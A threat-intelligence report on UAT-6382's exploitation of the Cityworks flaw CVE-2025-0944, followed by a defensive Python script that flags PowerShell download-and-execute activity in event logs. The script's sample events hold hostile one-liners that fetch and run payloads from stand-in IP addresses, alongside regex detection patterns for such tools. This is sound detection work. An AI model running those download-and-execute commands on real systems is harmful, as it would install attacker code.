A Chinese-speaking cyber threat group identified as UAT-6382 has been linked to the exploitation of a recently patched remote-code-execution flaw in the Trimble Cityworks software. This breach, which involved the vulnerability CVE-2025-0944, enabled the attackers to deploy Cobalt Strike and VShell tools.

According to Cisco Talos researchers, UAT-6382 exploited the vulnerability, conducted reconnaissance, and quickly deployed several web shells and custom malware to maintain persistent access. The activity, which began in January 2025, primarily targeted enterprise networks of local government bodies in the United States.

CVE-2025-0944 is a deserialization flaw rated CVSS 8.6 that allows remote code execution. It affects the asset management software used by many organizations and was added to the U.S. Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities (KEV) catalog in February 2025.

Indicators of compromise released by Trimble showed that the threat actors used this vulnerability to deliver a Rust-based loader, which in turn launched Cobalt Strike and a Go-based remote access tool. Cisco Talos tracks this Rust-based loader as TetraLoader and assesses that it was built with MaLoader, a publicly available malware builder.

Successful exploitation of Cityworks allowed UAT-6382 to perform initial reconnaissance to fingerprint the compromised servers. The group then deployed web shells widely used by Chinese hacking groups, such as AntSword and chinatso/Chopper, to carry out its operations, and was observed enumerating directories and staging files on the infected servers to simplify data exfiltration.

Researchers noted that UAT-6382 downloaded and deployed multiple backdoors onto compromised systems via PowerShell, solidifying its foothold in the targeted networks.
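The PowerShell download-and-execute staging described above is something a defender can hunt for in PowerShell Script Block Logging (Event ID 4104). The following is an added example, not code from Cisco Talos, Trimble or the original post: it triages constructed events modelled on the 4104 fields (ScriptBlockText, Computer, RecordId) and flags any block that both fetches remote content and executes it, noting when the payload is staged in a world-writable directory. The regexes, the directory list and the sample events (including the documentation-range IP addresses) are assumptions made for the example, not indicators from the incident.

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104) for the
download-then-execute staging pattern. Sample events are constructed for
this example and are not indicators from the UAT-6382 activity."""
import re
from dataclasses import dataclass, field

# Cmdlets, aliases and .NET calls that fetch content from a remote host.
DOWNLOAD_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|"
    r"DownloadFile|DownloadString|DownloadData|curl|wget)\b",
    re.IGNORECASE,
)
# Ways of running what was just fetched: launching a dropped file,
# evaluating fetched text, or proxying through a signed system binary.
EXECUTE_RE = re.compile(
    r"(Start-Process|Invoke-Expression|\biex\b|Invoke-Item|"
    r"&\s*['\"]?\S+\.(exe|dll|ps1|bat)\b|rundll32|regsvr32)",
    re.IGNORECASE,
)
# Locations any local account can write to; assumed list for the example.
WRITABLE_DIR_RE = re.compile(
    r"(\$env:TEMP|\$env:TMP|\\Temp\\|C:\\Users\\Public|\\ProgramData\\)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    record_id: int
    host: str
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A fetch and an execution in the same block is the staging pattern;
        # a writable staging directory raises confidence but is not required.
        return "download" in self.indicators and "execute" in self.indicators


def analyze_event(event: dict) -> Finding:
    """Tag one 4104-style event with the indicators its script block matches."""
    text = event["ScriptBlockText"]
    finding = Finding(event["RecordId"], event["Computer"])
    if DOWNLOAD_RE.search(text):
        finding.indicators.append("download")
    if EXECUTE_RE.search(text):
        finding.indicators.append("execute")
    if WRITABLE_DIR_RE.search(text):
        finding.indicators.append("writable-dir")
    return finding


def triage(events: list) -> list:
    """Return only the findings that show download plus execution."""
    return [f for f in map(analyze_event, events) if f.suspicious]


# Constructed sample events: two benign administrative blocks, then two
# blocks shaped like attacker staging (hypothetical hosts and addresses).
SAMPLE_EVENTS = [
    {"RecordId": 1, "Computer": "cw-app01.example.local",
     "ScriptBlockText": r"Get-ChildItem C:\inetpub\logs\LogFiles | "
                        r"Sort-Object LastWriteTime -Descending | Select-Object -First 5"},
    {"RecordId": 2, "Computer": "cw-app01.example.local",
     "ScriptBlockText": r"Invoke-WebRequest -Uri https://updates.example.internal/agent.msi "
                        r"-OutFile 'C:\Program Files\Agent\agent.msi'"},
    {"RecordId": 3, "Computer": "cw-app02.example.local",
     "ScriptBlockText": r'$p = "$env:TEMP\svc.exe"; (New-Object Net.WebClient)'
                        r'.DownloadFile("http://198.51.100.7/svc.exe", $p); Start-Process $p'},
    {"RecordId": 4, "Computer": "cw-app02.example.local",
     "ScriptBlockText": r"iex (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f.record_id} on {f.host}: {', '.join(f.indicators)}")
```

Record 2 downloads an installer but never runs it in the same block, so it is reported as a download only; records 3 and 4 are flagged because fetch and execution occur together, with record 3 additionally marked for staging in the user's TEMP directory. In production the same logic would be fed from the Microsoft-Windows-PowerShell/Operational channel rather than an inline list, and hits should be corroborated against web-server logs from the Cityworks host, since the page describes the PowerShell activity as following initial web shell deployment.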
